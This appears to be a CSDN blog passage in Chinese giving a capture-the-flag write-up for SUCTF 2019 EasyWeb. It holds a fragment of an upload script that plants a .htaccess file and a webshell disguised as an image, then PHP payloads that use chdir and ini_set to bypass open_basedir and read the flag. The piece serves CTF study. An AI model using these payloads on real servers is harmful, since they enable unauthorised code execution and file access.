-
[SUCTF 2019]EasyWeb
代码审计
") file1 = {'file':('.htaccess',htaccess,'image/jpeg')} data = {"upload":"submit"} res = requests.post(url = url,data = data,files = file1) print(res.text) file2 = {'file':('shell.r',shell,'image/jpeg')} data = {"upload":"submit"} res = requests.post(url = url,data = data,files = file2) print(res.text)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
上传成功,使用hackbar验证一下:
成功
使用蚁剑连接
在根目录下找到flag,但是看其他wp好像原题还有一层限制,需要绕过open_basedir,否则不能查看根目录
参考:open_basedir bypass这里利用chdir()与ini_set()组合bypass
1=mkdir('r1');chdir('r1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));- 1
在根目录找到flag
读取1=mkdir('r1');chdir('r1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(file_get_contents('THis_Is_tHe_F14g'));- 1
-
相关阅读:
【嵌入式C内存管理】
【人工智能入门预备知识】
小白系统初始化配置资源失败怎么办
模式也能开盲盒,”盲返“模式带动电商平台共享经济
7.从句学习
redis的优势和缺点要注意的
vue2升级vue3的新变化
React 性能调试好帮手:useWhyDidYouUpdate
《手把手教你》 mysql5.6.zip格式压缩版安装教程
Meta被曝收到巨额罚单 因超过5亿的用户数据被泄露
- 原文地址:https://blog.csdn.net/pakho_C/article/details/126905404
